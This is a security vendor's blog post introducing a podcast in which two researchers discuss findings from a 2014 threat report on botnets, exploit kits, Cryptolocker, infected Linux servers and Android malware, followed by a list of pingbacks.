Explaining botnets, exploit kits, Linux and Android malware (Podcast)

Security-Threat-Report-2014This year’s Security Threat Report explores how cybercriminals are becoming smarter, shadier and stealthier in their approach to infecting you with their malware. In a new Sophos Security podcast, our experts Chet Wisniewski and John Shier explain the SophosLabs research highlighted within the report.

Listen to the podcast (embedded below) to hear Chet and John discuss how the criminals operate, using sophisticated botnets and exploit kits to spread their malware. They also explain how the cybercriminals are increasingly skilled at covering their tracks.

Battle of the botnets

Despite recent successes by security companies and law enforcement in taking down botnets (networks of infected computers cybercriminals use to distribute malware and spam), the criminal gangs have found innovative ways of fighting back.

For example, efforts by Microsoft and security companies to dismantle the ZeroAccess botnet appear to have had little effect, Chet explains in the podcast.

“While I applaud organizations such as Microsoft for attempting to take down any kind of centralized component of a criminal network, the reality is we’ve got to do a better job of protecting our PCs,” Chet says.

“I think the battle of the botnets is going to be tough to win,” John says. “Their sole reason for being is to infect as many hosts as possible. And when one gets shut down, they’ll change their tactics.”

One of the largest botnets, called Zbot or Zeus, has recently been used to drop the Cryptolocker ransomware on infected machines. As John explains, a computer infected by Zbot/Zeus can be hit again and again by whatever malware the botnet operators distribute for a profit (botnets can be rented out to do the bidding of anyone with the means to pay).

New wave of exploit kits

John and Chet go on to describe how your computer might become part of a botnet: infection by drive-by web attacks from exploit kits. Although one of the most notorious exploit kits, called Blackhole, has faded in use since the arrest of its creators in October, other exploit kits such as Neutrino and Redkit have emerged to take its place.

“We saw a lot of diversification of the exploit kits that came out this year,” John says. “These guys are real entrepreneurs. They saw the success Blackhole was having and decided to emulate that exploit model.”

Exploit kits, which leverage multiple exploits to find a hole in your security, are intimately connected to a problem many IT professionals don’t often acknowledge: infected Linux servers.

“The vast majority of infected web servers that are directing people to these exploit kits to get infected are running Linux,” Chet explains.

Chet and John also share more insights from the Security Threat Report regarding the “breakneck speed” in the development of Android malware, and the ever-present problem of spam.

Listen to the podcast below or at soundcloud.com. And be sure to download the report to access other resources including whitepapers and videos from our experts.

19 thoughts on “Explaining botnets, exploit kits, Linux and Android malware (Podcast)

  1. Pingback: Botnets III: How to avoid them

  2. Pingback: BotNets: Understanding Robot Networks

  3. Pingback: Highlights from Security Threat Report 2014 (Video) | Sophos Blog

  4. Pingback: Infographic: Anatomy of a hacked mobile device | Sophos Blog

  5. Pingback: New webcast explaining threats for 2014: Smarter, Shadier and Stealthier Malware | Sophos Blog

  6. Pingback: Keep your website secure from exploit kits and hacker attacks (Video) | Sophos Blog

  7. Pingback: Cyber Streetwise security campaign asks: Would you do this IRL? (Video) | Sophos Blog

  8. Pingback: Botnets, zombies, and the wide world of spam (Podcast) | Sophos Blog

  9. Pingback: SophosLabs: Android malware intercepts SMS messages to steal mobile banking codes | Sophos Blog

  10. Pingback: Sophos at TED: See a malware attack in action | Sophos Blog

  11. Pingback: SophosLabs: Gameover banking malware now has a rootkit for better concealment | Sophos Blog

  12. Pingback: What’s new in Sophos UTM Accelerated (9.2): #7 – Safer Web Application Firewall | Sophos Blog

  13. Pingback: Sophos in the news: Gameover malware gets harder to kill; will Windows XP live on after death? | Sophos Blog

  14. Pingback: How malware works: Anatomy of an attack in five stages (Infographic) | Sophos Blog

  15. Pingback: SophosLabs: Techniques from APTs showing up in money-making Zbot/Zeus malware | Sophos Blog

  16. Pingback: SophosLabs research uncovers new developments in PlugX APT malware | Sophos Blog

  17. Pingback: Don’t believe these four myths about Linux security | Sophos Blog

  18. Pingback: Net Universe ǀ Connecting Solutions – Don’t believe these four myths about Linux security

  19. Pingback: Don’t believe these four myths about Linux security — The Cloud Key

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s